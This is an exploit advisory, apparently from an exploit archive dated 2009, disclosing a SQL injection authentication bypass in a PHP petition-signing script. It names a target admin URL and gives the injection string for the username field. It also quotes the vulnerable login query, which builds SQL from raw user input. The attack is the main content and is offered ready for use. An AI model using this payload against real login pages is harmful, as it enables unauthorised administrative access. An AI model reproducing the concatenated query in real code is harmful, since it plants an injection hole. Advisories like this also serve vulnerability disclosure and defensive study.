[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Free PHP Petition Signing Script (Auth Bypass) SQL Injection Vuln
# Published : 2009-03-27
# Author : Qabandi
# Previous Title : Simply Classified 0.2 (category_id) SQL Injection Vulnerability
# Next Title : Arcadwy Arcade Script (username) Static XSS Vulnerability
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .
######################################################
# Free PHP Petition Signing Script Release #
# Login SQL injection #
######################################################
# Qabandi | iqa[a]hotmail.fr #
From Kuwait, Peace.
Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, Cyb3rT
######################################################
Download: http://www.rediscussed.com/2008/01/18/free-php-petition-signing-script-release/
------------------------------------------------------
-:PoC:-
http://usa-homeland.org/pet/signing_system-admin
Username: admin ' or ' 1=1
Password: nothing
------------vuln--code---------(./signing_system-admin/index.php)
$query = mysql_query("SELECT username,password FROM `accounts` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());
------------------------------------
# www.Syue.com [2009-03-27]